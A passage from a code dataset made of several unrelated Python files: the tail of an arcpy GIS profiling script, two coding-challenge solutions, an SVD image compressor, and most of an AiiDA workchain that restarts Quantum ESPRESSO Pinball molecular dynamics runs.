\"tester_2_{}\".format(str(item)), \"midpoint_x\", \"midpoint_y\", distance_field=\"half_length\",bearing_field=\"bearing_2\")\n bearing += 18\n print(bearing)\n\n\n \n\n arcpy.management.Merge([\"tester_1_{}\".format(str(item)),\"tester_2_{}\".format(str(item))],\"templayer\")\n arcpy.management.Dissolve(\"templayer\", \"profile_{}\".format(item))\n \n profile_list.append(\"profile_{}\".format(item))\n\n arcpy.management.Merge(profile_list ,\"profiles\")\n # add code field\n arcpy.AddField_management(\"profiles\", code, \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(\"profiles\", \"profielnummer\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.management.CalculateField(\"profiles\", code, \"'code'\", \"PYTHON3\")\n arcpy.management.CalculateField(\"profiles\", \"profielnummer\", '!OBJECTID!', \"PYTHON3\")\n copy_trajectory_lr(trajectory,code,1)\n set_measurements_trajectory(\"profiles\", trajectory, code, point_interval)\n\n \n \n break\n \nrewrite_rasters()\nprofiles_part1()\n# find_steepest_profile()\n","repo_name":"vincentwolf89/wsrlOpenGeo","sub_path":"total.py","file_name":"total.py","file_ext":"py","file_size_in_byte":20599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"70179697327","text":"def jumpingOnClouds(c):\n current = 0\n end = len(c) - 1\n counts = 0\n while current < end:\n if ((current + 2) <= end) and (c[current + 2] == 0):\n current += 2\n counts += 1\n elif c[current + 1] == 0:\n current += 1\n counts += 1\n return counts\n\nprint(jumpingOnClouds([0,1, 0, 0, 0, 1,0]))","repo_name":"Anuoluwa/CSC","sub_path":"Code_Challenge/solution_py/jumpOnClouds.py","file_name":"jumpOnClouds.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"71373138607","text":"#\n# 面试题 04.06\n#\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def inorderSuccessor(self, root: TreeNode, p: TreeNode) -> TreeNode:\n if not root:\n return\n cur, res = root, None\n while cur:\n if cur.val > p.val:\n res = cur\n cur = cur.left\n else:\n cur = cur.right\n return res\n","repo_name":"dreamhunter2333/leetcode_practise","sub_path":"leetcode/面试题04.06.py","file_name":"面试题04.06.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
+{"seq_id":"24389912955","text":"import numpy\nfrom PIL import Image\n\n\n# FUNCTION DEFINTIONS:\n\n# open the image and return 3 matrices, each corresponding to one channel (R, G and B channels)\ndef openImage(imagePath):\n imOrig = Image.open(imagePath)\n im = numpy.array(imOrig)\n\n aRed = im[:, :, 0]\n aGreen = im[:, :, 1]\n aBlue = im[:, :, 2]\n\n return [aRed, aGreen, aBlue, imOrig]\n\n\n# compress the matrix of a single channel\ndef compressSingleChannel(channelDataMatrix, singularValuesLimit):\n uChannel, sChannel, vhChannel = numpy.linalg.svd(channelDataMatrix)\n aChannelCompressed = numpy.zeros((channelDataMatrix.shape[0], channelDataMatrix.shape[1]))\n k = singularValuesLimit\n\n leftSide = numpy.matmul(uChannel[:, 0:k], numpy.diag(sChannel)[0:k, 0:k])\n aChannelCompressedInner = numpy.matmul(leftSide, vhChannel[0:k, :])\n aChannelCompressed = aChannelCompressedInner.astype('uint8')\n return aChannelCompressed\n\n\n# MAIN PROGRAM:\ndef compressImage(nameImage):\n print('Starting Compression')\n aRed, aGreen, aBlue, originalImage = openImage(nameImage)\n # image width and height:\n imageWidth,imageHeight = originalImage.size\n # number of singular values to use for reconstructing the compressed image\n singularValuesLimit = 300\n #Compress in single channel for each color\n aRedCompressed = compressSingleChannel(aRed, singularValuesLimit)\n aGreenCompressed = compressSingleChannel(aGreen, singularValuesLimit)\n aBlueCompressed = compressSingleChannel(aBlue, singularValuesLimit)\n #reconstruct image\n imr = Image.fromarray(aRedCompressed, mode=None)\n img = Image.fromarray(aGreenCompressed, mode=None)\n imb = Image.fromarray(aBlueCompressed, mode=None)\n newImage = Image.merge(\"RGB\", (imr, img, imb))\n originalImage.show()\n newImage.show()\n #SAVE IN HDD THE NEW IMAGE\n newImage = newImage.save(\"nuevafoto.jpg\")\n #Convert RGB to Grayscale\n imgGs = Image.open('nuevafoto.jpg').convert('LA')\n imgGs.save('greyscalefoto.png')\n imgGs.show()\n\n #Print some info\n mr = imageHeight\n mc = imageWidth\n originalSize = mr * mc * 3\n compressedSize = singularValuesLimit * (1 + mr + mc) * 3\n ratio = compressedSize * 1.0 / originalSize\n print('original size:')\n print(originalSize)\n print('compressed size:')\n print(compressedSize)\n print('Compressed image size is ' + str(round(ratio * 100, 2)) + '% of the original image ')\n print('DONE - Compressed the image')\n\ncompressImage('foto.jpg')","repo_name":"rodo-code/ImageCompressorSVD","sub_path":"compressor.py","file_name":"compressor.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"22714629466","text":"# -*- coding: utf-8 -*-\n\"\"\"Workchain to run MD calculations using Pinball pw.x. based on Quantum ESPRESSO\"\"\"\nfrom aiida import orm\nfrom aiida.common import AttributeDict, exceptions\nfrom aiida.common.links import LinkType\nfrom aiida.engine import ToContext, if_, while_, BaseRestartWorkChain, process_handler, ProcessHandlerReport, ExitCode\nfrom aiida.plugins import CalculationFactory, GroupFactory, WorkflowFactory\n\n## builder imports\nfrom aiida.common.lang import type_check\nfrom aiida_quantumespresso.common.types import ElectronicType, SpinType\nSsspFamily = GroupFactory('pseudo.family.sssp')\nPseudoDojoFamily = GroupFactory('pseudo.family.pseudo_dojo')\nCutoffsPseudoPotentialFamily = GroupFactory('pseudo.family.cutoffs')\n\nfrom aiida_quantumespresso.utils.defaults.calculation import pw as qe_defaults\nfrom aiida_quantumespresso.workflows.pw.base import PwBaseWorkChain\nfrom aiida_flipper.utils.utils import get_or_create_input_node\nfrom aiida_flipper.calculations.functions.functions import get_structure_from_trajectory, concatenate_trajectory\n\nPwCalculation = CalculationFactory('quantumespresso.pw')\nFlipperCalculation = CalculationFactory('quantumespresso.flipper')\n#HustlerCalculation = CalculationFactory('quantumespresso.hustler')\n\n\ndef get_completed_number_of_steps(calc):\n \"\"\"Read the number of steps from the trajectory.\"\"\"\n traj = calc.outputs.output_trajectory\n nstep = calc.inputs.parameters.get_attribute('CONTROL').get('iprint', 1) * \\\n (traj.get_attribute('array|positions')[0] - 1) # the zeroth step is also saved\n return nstep\n\ndef get_total_trajectory(workchain, previous_trajectory=None, store=False):\n \"\"\"Collect all the trajectory segment and concatenate them.\"\"\"\n qb = orm.QueryBuilder()\n qb.append(orm.WorkChainNode, filters={'uuid': workchain.uuid}, tag='replay')\n # TODO: Are filters on the state of the calculation needed here?\n # TODO: add project on extras.discard_trajectory, traj_d defined to skip them\n qb.append(orm.CalcJobNode, with_incoming='replay',\n edge_filters={'type': LinkType.CALL_CALC.value,\n 'label': {'like': 'iteration_%'}},\n edge_project='label', tag='calc', edge_tag='rc')\n qb.append(orm.TrajectoryData, with_incoming='calc', edge_filters={'label': 'output_trajectory'},\n project=['*'], tag='traj')\n traj_d = {item['rc']['label'].replace('iteration_', 'trajectory_'): item['traj']['*'] for item in qb.iterdict()} ## if not extras.discard_trajectory\n\n # adding the trajectory of previous MD run, if it exists\n if previous_trajectory:\n traj_d.update({'trajectory_00': previous_trajectory})\n\n # if I have produced several trajectories, I concatenate them here: (no need to sort them)\n if (len(traj_d) > 1):\n traj_d['metadata'] = {'call_link_label': 'concatenate_trajectory', 'store_provenance': store}\n traj_d.update({'remove_repeated_last_step': True})\n res = concatenate_trajectory(**traj_d)\n return res['concatenated_trajectory']\n elif (len(traj_d) == 1):\n # no reason to concatenate if I have only one trajectory (saves space in repository)\n return list(traj_d.values())[0]\n else:\n return None\n\ndef get_slave_calculations(workchain):\n \"\"\"\n Returns a list of the calculations that was called by the WF, ordered.\n \"\"\"\n qb = orm.QueryBuilder()\n qb.append(orm.WorkChainNode, filters={'uuid': workchain.uuid}, tag='m')\n qb.append(orm.CalcJobNode, with_incoming='m',\n edge_project='label', edge_filters={'label': {'like': 'iteration_%'}},\n tag='c', edge_tag='mc', project='*')\n calc_d = {item['mc']['label']: item['c']['*'] for item in qb.iterdict()}\n sorted_calcs = sorted(calc_d.items())\n return list(zip(*sorted_calcs))[1] if sorted_calcs else None\n\n\nclass ReplayMDWorkChain(PwBaseWorkChain):\n \"\"\"\n Workchain to run a molecular dynamics Quantum ESPRESSO pw.x calculation with automated error handling and restarts.\n\n `nstep` can be specified as input or in the `CONTROL.nstep` attribute of the parameters node.\n\n Velocities are read from the `ATOMIC_VELOCITIES` key of the settings node.\n If not found they will be initialized.\n \"\"\"\n ## NOTES ##\n # with 'replay' we indicate a molecular dynamics restart, in which positions & velocities are read from the\n # last step of the previous trajectory. In this work chain we always perform a 'dirty restart', i.e. the charge\n # densities are always initialized from scratch (we do not use the `restart_mode='restart'` of QE).\n # In reality, in the Pinball code the host-lattice charge density is always read from file. Therefore we always\n # set a `parent_folder`, such that the plugin will copy it to the new location when restarting.\n #\n # The parser of a FlipperCalculation will return an output trajectory node if it manages to parse it.\n # As long as an output trajectory was produced, erros raised from the parsing of the aiida.out log file\n # (e.g. out of walltime, incomplete output, ...) will be ignored and we shall try to (dirty) restart.\n\n ## QUESTION ##\n # probably we could define the `_process_class` at the instance level, thus allowing one to choose\n # to use either a `PwCalculation`, `FlipperCalculation`, or `HustlerCalculation` without redefining this class.\n # The drawback is probably that (I guess) the inputs will not be exposed (in the builder?)?\n # Alternatively, one could just define subclasses where `_process_class` is set accordingly.\n _process_class = FlipperCalculation # probably we can define this in a subclass\n\n defaults = AttributeDict({\n 'qe': qe_defaults,\n 'delta_threshold_degauss': 30,\n 'delta_factor_degauss': 0.1,\n 'delta_factor_mixing_beta': 0.8,\n 'delta_factor_max_seconds': 0.90,\n 'delta_max_seconds': 180,\n 'delta_factor_nbnd': 0.05,\n 'delta_minimum_nbnd': 4,\n })\n\n @classmethod\n def define(cls, spec):\n \"\"\"Define the process specification.\"\"\"\n # yapf: disable\n # NOTE: input, outputs, and exit_codes are inherited from PwBaseWorkChain\n super().define(spec)\n spec.expose_inputs(FlipperCalculation, namespace='pw', exclude=('kpoints',))\n\n # the calculation namespace is still 'pw'\n spec.inputs['pw']['parent_folder'].required = True\n #spec.inputs.pop('pw.metadata.options.without_xml')\n\n # this stuff is not supported by pinball:\n spec.inputs['pw'].pop('hubbard_file')\n spec.inputs['pw'].pop('vdw_table')\n spec.inputs.pop('automatic_parallelization')\n\n spec.input('nstep', valid_type=orm.Int, required=False,\n help='Number of MD steps (it will be read from the input parameters otherwise).')\n #spec.input('is_hustler', valid_type=orm.Bool, required=False, default=lambda: orm.Bool(False))\n spec.input('total_energy_max_fluctuation', valid_type=orm.Float, required=False,\n help='The maximum total energy fluctuation allowed (eV). If the total energy has varied more than this '\n 'threshold, the workchain will fail.')\n spec.input('previous_trajectory', valid_type=orm.TrajectoryData, required=False,\n help='Trajectory of previous calculation, needed to pickup from last MD run (otherwise we do a normal start from flipper compatible structure).')\n\n spec.outline(\n cls.setup,\n cls.validate_parameters,\n cls.validate_kpoints,\n cls.validate_pseudos,\n # cls.validate_resources,\n #if_(cls.should_run_init)(\n # cls.validate_init_inputs,\n # cls.run_init,\n # cls.inspect_init,\n #),\n while_(cls.should_run_process)(\n cls.prepare_process,\n cls.run_process,\n cls.inspect_process,\n cls.check_energy_fluctuations,\n cls.update_mdsteps,\n ),\n cls.results,\n )\n\n #spec.expose_outputs(PwCalculation)\n spec.outputs.clear()\n spec.output('total_trajectory', valid_type=orm.TrajectoryData, required=True,\n help='The full concatenated trajectory.')\n spec.default_output_node = 'total_trajectory'\n\n spec.inputs['handler_overrides'].default = lambda: orm.Dict(dict={\n 'sanity_check_insufficient_bands': False,\n 'handle_out_of_walltime': True,\n 'handle_vcrelax_converged_except_final_scf': False,\n 'handle_relax_recoverable_ionic_convergence_error': False,\n 'handle_relax_recoverable_electronic_convergence_error': False,\n #'handle_electronic_convergence_not_achieved': False,\n })\n\n # TODO: we should pop the spec.exit_codes that do not apply\n spec.exit_code(205, 'ERROR_INVALID_INPUT_MD_PARAMETERS',\n message='Input parameters for molecular dynamics are not correct.')\n spec.exit_code(206, 'ERROR_INVALID_INPUT_VELOCITIES',\n message='Velocities are not compatible with the number of atoms of the structure.')\n spec.exit_code(601, 'ERROR_TOTAL_ENERGY_FLUCTUATIONS',\n message='Fluctuations of the total energy exceeded the set threshold.')\n\n def setup(self):\n \"\"\"Call the `setup` of the `PwBaseWorkChain` and then create the inputs dictionary in `self.ctx.inputs`.\n\n This `self.ctx.inputs` dictionary will be used by the `BaseRestartWorkChain` to submit the calculations in the\n internal loop.\n \"\"\"\n super().setup()\n #self.ctx.restart_calc = None\n self.ctx.inputs = AttributeDict(self.exposed_inputs(FlipperCalculation, 'pw'))\n\n self.ctx.inputs.parameters = self.ctx.inputs.parameters.get_dict()\n self.ctx.inputs.settings = self.ctx.inputs.settings.get_dict() if 'settings' in self.ctx.inputs else {}\n \n self.ctx.inputs.pop('vdw_table', None)\n self.ctx.inputs.pop('hubbard_file', None)\n self.ctx.mdsteps_done = 0\n \n @classmethod\n def get_protocol_filepath(cls):\n \"\"\"Return ``pathlib.Path`` to the ``.yaml`` file that defines the protocols.\"\"\"\n from importlib_resources import files\n from aiida_flipper.workflows import protocols as proto\n return files(proto) / 'replay.yaml'\n\n @classmethod\n def get_builder_from_protocol(\n cls,\n code,\n structure,\n parent_folder,\n nstep=None,\n total_energy_max_fluctuation=None,\n previous_trajectory=None,\n protocol=None,\n overrides=None,\n electronic_type=ElectronicType.INSULATOR,\n spin_type=SpinType.NONE,\n initial_magnetic_moments=None,\n **_\n ):\n \"\"\"\n !! This is a copy of PwBaseWorkChain get_builder_from_protocol() with a change of default\n electronic type to insulator and addition of flipper inputs and loading of flipper protocol file!!\n Return a builder prepopulated with inputs selected according to the chosen protocol.\n :param code: the ``Code`` instance configured for the ``quantumespresso.pw`` plugin.\n :param structure: the ``StructureData`` instance to use.\n :param parent_folder: the location of charge densities of host lattice\n :param nstep: the number of MD steps to perform, which in case of hustler calculation means the number of configurations on which pinball/DFT forces will be evaluated\n :param total_energy_max_fluctuation: If the total energy exceeeds this threshold I will stop the workchain\n :param previous_trajectory: if provided I will start the calculation from the positions and velocities of that trajectory\n :param protocol: protocol to use, if not specified, the default will be used.\n :param overrides: optional dictionary of inputs to override the defaults of the protocol.\n :param electronic_type: indicate the electronic character of the system through ``ElectronicType`` instance.\n :param spin_type: indicate the spin polarization type to use through a ``SpinType`` instance.\n :param initial_magnetic_moments: optional dictionary that maps the initial magnetic moment of each kind to a\n desired value for a spin polarized calculation. Note that for ``spin_type == SpinType.COLLINEAR`` an \n initial guess for the magnetic moment is automatically set in case this argument is not provided.\n :return: a process builder instance with all inputs defined ready for launch.\n \"\"\"\n from aiida_quantumespresso.workflows.protocols.utils import get_starting_magnetization\n\n if isinstance(code, str):\n code = orm.load_code(code)\n\n type_check(code, orm.Code)\n type_check(electronic_type, ElectronicType)\n type_check(spin_type, SpinType)\n\n if electronic_type not in [ElectronicType.METAL, ElectronicType.INSULATOR]:\n raise NotImplementedError(f'electronic type `{electronic_type}` is not supported.')\n\n if spin_type not in [SpinType.NONE, SpinType.COLLINEAR]:\n raise NotImplementedError(f'spin type `{spin_type}` is not supported.')\n\n if initial_magnetic_moments is not None and spin_type is not SpinType.COLLINEAR:\n raise ValueError(f'`initial_magnetic_moments` is specified but spin type `{spin_type}` is incompatible.')\n\n inputs = cls.get_protocol_inputs(protocol, overrides)\n\n meta_parameters = inputs.pop('meta_parameters')\n pseudo_family = inputs.pop('pseudo_family')\n\n natoms = len(structure.sites)\n\n try:\n pseudo_set = (PseudoDojoFamily, SsspFamily, CutoffsPseudoPotentialFamily)\n pseudo_family = orm.QueryBuilder().append(pseudo_set, filters={'label': pseudo_family}).one()[0]\n except exceptions.NotExistent as exception:\n raise ValueError(\n f'required pseudo family `{pseudo_family}` is not installed. Please use `aiida-pseudo install` to'\n 'install it.'\n ) from exception\n\n try:\n cutoff_wfc, cutoff_rho = pseudo_family.get_recommended_cutoffs(structure=structure, unit='Ry')\n except ValueError as exception:\n raise ValueError(\n f'failed to obtain recommended cutoffs for pseudo family `{pseudo_family}`: {exception}'\n ) from exception\n\n parameters = inputs['pw']['parameters']\n # parameters['CONTROL']['etot_conv_thr'] = natoms * meta_parameters['etot_conv_thr_per_atom']\n parameters['ELECTRONS']['conv_thr'] = natoms * meta_parameters['conv_thr_per_atom']\n parameters['SYSTEM']['ecutwfc'] = cutoff_wfc\n parameters['SYSTEM']['ecutrho'] = cutoff_rho\n\n if electronic_type is ElectronicType.METAL:\n parameters['SYSTEM']['occupations'] = 'smearing'\n parameters['SYSTEM'].update({'degauss': 0.01, 'smearing': 'cold'})\n\n if spin_type is SpinType.COLLINEAR:\n starting_magnetization = get_starting_magnetization(structure, pseudo_family, initial_magnetic_moments)\n\n parameters['SYSTEM']['nspin'] = 2\n parameters['SYSTEM']['starting_magnetization'] = starting_magnetization\n\n # pylint: disable=no-member\n builder = cls.get_builder()\n builder.pw['code'] = code\n builder.pw['pseudos'] = pseudo_family.get_pseudos(structure=structure)\n # removing the default Li pseudopotential so that user can provide the correct one \n builder.pw['pseudos'].pop('Li')\n builder.pw['structure'] = structure\n builder.pw['parameters'] = orm.Dict(dict=parameters)\n builder.pw['metadata'] = inputs['pw']['metadata']\n if 'parallelization' in inputs['pw']:\n builder.pw['parallelization'] = orm.Dict(dict=inputs['pw']['parallelization'])\n builder.clean_workdir = orm.Bool(inputs['clean_workdir'])\n if 'settings' in inputs['pw']:\n builder['pw'].settings = orm.Dict(dict=inputs['pw']['settings'])\n if inputs['pw']['settings']['gamma_only']:\n kpoints = orm.KpointsData()\n kpoints.set_kpoints_mesh([1,1,1])\n builder.kpoints = kpoints\n else: \n raise NotImplementedError('Only gamma k-points possible in flipper calculations.')\n\n builder['pw']['parent_folder'] = parent_folder\n builder['nstep'] = orm.Int(inputs['nstep'])\n if total_energy_max_fluctuation: \n builder['total_energy_max_fluctuation'] = total_energy_max_fluctuation\n else: \n builder['total_energy_max_fluctuation'] = orm.Float(0.5 * 1.e4 * natoms * meta_parameters['etot_conv_thr_per_atom'])\n if previous_trajectory: builder['previous_trajectory'] = previous_trajectory\n # pylint: enable=no-member\n return builder\n\n def validate_parameters(self):\n \"\"\"Validate inputs that might depend on each other and cannot be validated by the spec.\n\n Also define dictionary `inputs` in the context, that will contain the inputs for the calculation that will be\n launched in the `run_calculation` step.\n \"\"\"\n\n if not self.ctx.inputs.parameters['CONTROL']['calculation'] == 'md':\n return self.exit_codes.ERROR_INVALID_INPUT_MD_PARAMETERS \n if self.inputs.get('is_hustler', False):\n raise NotImplementedError('Please run hustler workchain.')\n\n nstep = self.ctx.inputs.parameters['CONTROL'].get('nstep', None)\n inp_nstep = self.inputs.get('nstep')\n if inp_nstep and nstep:\n self.report('You cannot specify both \"nstep\" and \"parameters.CONTROL.nstep\"')\n return self.exit_codes.ERROR_INVALID_INPUT_MD_PARAMETERS\n elif inp_nstep is None and nstep is None:\n self.report('You must specify either \"nstep\" or \"parameters.CONTROL.nstep\"')\n return self.exit_codes.ERROR_INVALID_INPUT_MD_PARAMETERS\n elif inp_nstep:\n nstep = inp_nstep.value\n self.ctx.mdsteps_todo = nstep\n\n # In the pinball, the parent folder contains the host-lattice charge density and is always given as input,\n # so this is done automatically during the setup:\n # self.ctx.inputs.parent_folder = self.inputs.pw.parent_folder\n # We will not change the parent_folder after a replay\n\n # At each replay, a restart_calc will be set, meaning that md should be (dirty)-restarted from the trajectory\n # produced by the last calculation\n self.ctx.restart_calc = None\n\n # if velocities were given in the input parameters or settings, we will use them\n initial_velocities = self.ctx.inputs.settings.get('ATOMIC_VELOCITIES', None)\n params_velocities = self.ctx.inputs.parameters.pop('ATOMIC_VELOCITIES', None)\n if initial_velocities and params_velocities:\n self.report('Please specify initial ATOMIC_VELOCITIES either in parameters or in settings.')\n return self.exit_codes.ERROR_INVALID_INPUT_MD_PARAMETERS\n elif params_velocities:\n self.ctx.inputs.settings['ATOMIC_VELOCITIES'] = params_velocities\n initial_velocities = params_velocities\n if initial_velocities:\n self.ctx.has_initial_velocities = True\n if len(initial_velocities) != len(self.ctx.inputs.structure.sites):\n raise self.exit_codes.ERROR_INVALID_INPUT_VELOCITIES\n else:\n self.ctx.has_initial_velocities = False\n\n self.ctx.inputs.parameters.setdefault('CONTROL', {})\n self.ctx.inputs.parameters['CONTROL'].setdefault('calculation', 'md')\n #self.ctx.is_hustler = self.inputs.is_hustler\n\n # If trajectory is provided, check that the parameters are same across the 2 MD runs\n if self.inputs.get('previous_trajectory'):\n\n self.ctx.previous_trajectory = self.inputs.get('previous_trajectory')\n qb = orm.QueryBuilder()\n qb.append(orm.TrajectoryData, filters={'id':{'==':self.ctx.previous_trajectory.pk}}, tag='traj')\n qb.append(CalculationFactory('quantumespresso.flipper'), with_outgoing='traj')\n if qb.count():\n cc, = qb.first()\n param_d = cc.inputs['parameters'].get_dict()\n struct = cc.inputs['structure']\n if struct.pk != self.ctx.inputs.structure.pk: raise Exception('Structure of previous trajectory not matching with input structure, please provide right trajectory.')\n if param_d['CONTROL']['iprint'] != self.ctx.inputs.parameters['CONTROL']['iprint']: raise Exception('iprint of previous trajectory not matching with input irpint, please provide right trajectory.')\n if param_d['CONTROL']['dt'] != self.ctx.inputs.parameters['CONTROL']['dt']: raise Exception('dt of previous trajectory not matching with input dt, please provide right trajectory.')\n else:\n self.report('WorkChain of previous trajectory not found, trying preceding concatenating calcfunction')\n qb = orm.QueryBuilder()\n qb.append(orm.TrajectoryData, filters={'id':{'==':self.ctx.previous_trajectory.pk}}, tag='traj')\n qb.append(orm.CalcFunctionNode, with_outgoing='traj', tag='calcfunc')\n qb.append(orm.TrajectoryData, with_outgoing='calcfunc', tag='old_traj')\n qb.append(WorkflowFactory('quantumespresso.flipper.replaymd'), with_outgoing='old_traj', tag='replay')\n if qb.count():\n wc, = qb.first()\n param_d = wc.inputs['pw']['parameters'].get_dict()\n struct = wc.inputs['pw']['structure']\n if struct.pk != self.ctx.inputs.structure.pk: raise Exception('Structure of previous trajectory not matching with input structure, please provide right trajectory.')\n if param_d['CONTROL']['iprint'] != self.ctx.inputs.parameters['CONTROL']['iprint']: raise Exception('iprint of previous trajectory not matching with input irpint, please provide right trajectory.')\n if param_d['CONTROL']['dt'] != self.ctx.inputs.parameters['CONTROL']['dt']: raise Exception('dt of previous trajectory not matching with input dt, please provide right trajectory.')\n else:\n self.report('Calcfunction associated with previous trajectory not found; continuing nonetheless') \n \n # I update the mdsteps_todo here\n nsteps_of_previous_trajectory = self.ctx.inputs.parameters['CONTROL']['iprint'] * (self.ctx.previous_trajectory.attributes['array|positions'][0] - 1)\n self.ctx.mdsteps_todo -= nsteps_of_previous_trajectory\n # Even if the previous trajectory is longer than the required nsteps, I don't care, \n # mdsteps_todo will be -ve in that case and the replaymdwc will not be launched\n self.ctx.mdsteps_done += nsteps_of_previous_trajectory\n\n # if not self.ctx.inputs.parameters['CONTROL'].get('lflipper', False):\n # try:\n # if self.ctx.previous_trajectory.get_array('steps').size > 1:\n # raise Exception(f'The trajectory <{self.ctx.previous_trajectory.id}> provided for thermalisation is too long')\n # except (KeyError, exceptions.NotExistent):\n # raise RuntimeError('No trajectory found for thermalisation, aborting now')\n\n# def validate_kpoints(self):\n# \"\"\"Validate the inputs related to k-points.\n#\n# Either an explicit `KpointsData` with given mesh/path, or a desired k-points distance should be specified. In\n# the case of the latter, the `KpointsData` will be constructed for the input `StructureData` using the\n# `create_kpoints_from_distance` calculation function.\n# \"\"\"\n\n# def validate_pseudos(self):\n# \"\"\"Validate the inputs related to pseudopotentials.\n#\n# Either the pseudo potentials should be defined explicitly in the `pseudos` namespace, or alternatively, a family\n# can be defined in `pseudo_family` that will be used together with the input `StructureData` to generate the\n# required mapping.\n# \"\"\"\n\n# def validate_resources(self):\n# \"\"\"Validate the inputs related to the resources.\n#\n# One can omit the normally required `options.resources` input for the `PwCalculation`, as long as the input\n# `automatic_parallelization` is specified. If this is not the case, the `metadata.options` should at least\n# contain the options `resources` and `max_wallclock_seconds`, where `resources` should define the `num_machines`.\n# \"\"\"\n\n def set_max_seconds(self, max_wallclock_seconds):\n \"\"\"Set the `max_seconds` to a fraction of `max_wallclock_seconds` option to prevent out-of-walltime problems.\n\n :param max_wallclock_seconds: the maximum wallclock time that will be set in the scheduler settings.\n \"\"\"\n max_seconds_factor = self.defaults.delta_factor_max_seconds\n max_seconds_delta = self.defaults.delta_max_seconds\n # give the code 3 minutes to terminate gracefully, or 90% of your estimate (for very low numbers, to avoid negative)\n max_seconds = max((max_seconds_delta, max_wallclock_seconds * max_seconds_factor))\n self.ctx.inputs.parameters['CONTROL']['max_seconds'] = max_seconds\n # if needed, set the scheduler max walltime to be at least 1 minute longer than max_seconds\n self.ctx.inputs.metadata.options.update({'max_wallclock_seconds': max(max_wallclock_seconds, max_seconds + 60)})\n\n def should_run_process(self):\n \"\"\"Return whether a new process should be run.\n\n This is the case as long as the last process has not finished successfully, the maximum number of restarts has\n not yet been exceeded, and the number of desired MD steps has not been reached.\n \"\"\"\n return not(self.ctx.is_finished) and (self.ctx.iteration < self.inputs.max_iterations.value) and (self.ctx.mdsteps_todo > 0)\n\n def prepare_process(self):\n \"\"\"Prepare the inputs for the next calculation.\n\n In the pinball, the `parent_folder` is never changed, and the `restart_mode` is not set.\n\n If a `restart_calc` has been set in the context, the structure & velocities will be read from its output\n trajectory.\n \"\"\"\n # NOTE pinball: the parent folder (charge density) does not change, we do not need to specify the restart mode\n if self.ctx.restart_calc:\n # if it is a replay, extract structure and velocities from trajectory of restart_calc\n # NOTE (TODO): if we are retrying a calculation identical to the prev one (e.g. after an unhandled failure),\n # there is no need to extract the structure & velocities again\n try:\n prev_trajectory = self.ctx.restart_calc.outputs.output_trajectory\n except (KeyError, exceptions.NotExistent):\n raise RuntimeError('Previous trajectory not found!')\n self.ctx.inputs.parameters['IONS']['ion_velocities'] = 'from_input'\n kwargs = {'trajectory': prev_trajectory,\n 'parameters': get_or_create_input_node(orm.Dict,\n dict(step_index=-1,\n recenter=False,\n create_settings=True,\n complete_missing=True),\n store=True),\n 'structure': self.ctx.inputs.structure,\n 'metadata': {'call_link_label': 'get_structure'}}\n if self.ctx.inputs.settings:\n kwargs['settings'] = get_or_create_input_node(orm.Dict, self.ctx.inputs.settings, store=True)\n\n res = get_structure_from_trajectory(**kwargs)\n\n self.ctx.inputs.structure = res['structure']\n self.ctx.inputs.settings = res['settings'].get_dict()\n #self.ctx.inputs.parameters['CONTROL']['restart_mode'] = 'restart' ## NOT NEEDED IN PINBALL\n elif self.inputs.get('previous_trajectory'):\n self.ctx.inputs.parameters['IONS']['ion_velocities'] = 'from_input'\n kwargs = {'trajectory': self.ctx.previous_trajectory,\n 'parameters': get_or_create_input_node(orm.Dict,\n dict(step_index=-1,\n recenter=False,\n create_settings=True,\n complete_missing=True),\n store=True),\n 'structure': self.ctx.inputs.structure,\n 'metadata': {'call_link_label': 'get_structure'}}\n if self.ctx.inputs.settings:\n kwargs['settings'] = get_or_create_input_node(orm.Dict, self.ctx.inputs.settings, store=True)\n\n res = get_structure_from_trajectory(**kwargs)\n\n self.ctx.inputs.structure = res['structure']\n self.ctx.inputs.settings = res['settings'].get_dict()\n\n self.report(f'launching WorkChain from a previous trajectory <{self.ctx.previous_trajectory.pk}>')\n \n else:\n # start from scratch, eventually use `initial_velocities` if defined in input settings\n # (these were already added to `self.ctx.inputs.settings` by `validate_parameters`)\n if self.ctx.has_initial_velocities:\n self.ctx.inputs.parameters['IONS']['ion_velocities'] = 'from_input'\n #self.ctx.inputs.parameters['CONTROL']['restart_mode'] = 'from_scratch' ## NOT NEEDED IN PINBALL\n #self.ctx.inputs.pop('parent_folder', None)\n\n ## Setting wallclock option for smooth exit\n max_wallclock_seconds = self.ctx.inputs.metadata.options.get('max_wallclock_seconds', None)\n if max_wallclock_seconds is not None and 'max_seconds' not in self.ctx.inputs.parameters['CONTROL']: \n self.set_max_seconds(max_wallclock_seconds)\n\n self.ctx.inputs.parameters['CONTROL']['nstep'] = self.ctx.mdsteps_todo\n self.ctx.inputs.metadata['label'] = f'flipper_{self.ctx.iteration:02d}'\n self.ctx.has_initial_velocities = False\n\n ## if this is not flipper MD\n #if not input_dict['CONTROL'].get('lflipper', False):\n # input_dict['IONS']['wfc_extrapolation'] = 'second_order'\n # input_dict['IONS']['pot_extrapolation'] = 'second_order'\n\n ## HUSTLER STUFF (not implemented)\n if self.inputs.get('is_hustler', False):\n raise NotImplementedError('Please run hustler workchain.')\n # hustler_positions = self.inputs.hustler_positions\n # if self.ctx.steps_done:\n # #~ self.ctx.array_splitting_indices.append(self.ctx.steps_done)\n # inlinec, res = split_hustler_array_inline(\n # array=hustler_positions, parameters=get_or_create_parameters(dict(index=self.ctx.steps_done))\n # )\n # return_d['split_hustler_array_{}'.format(\n # str(self.ctx.iteration).rjust(len(str(self._MAX_ITERATIONS)), str(0))\n # )] = inlinec\n # calc.use_array(res['split_array'])\n # else:\n # calc.use_array(hustler_positions)\n\n# def run_process(self):\n# \"\"\"Run the next process, taking the input dictionary from the context at `self.ctx.inputs`.\"\"\"\n\n# def inspect_process(self):\n# \"\"\"Analyse the results of the previous process and call the handlers when necessary. [...]\"\"\"\n# super().inspect_process()\n\n def check_energy_fluctuations(self):\n \"\"\"Check the fluctuations of the total energy of 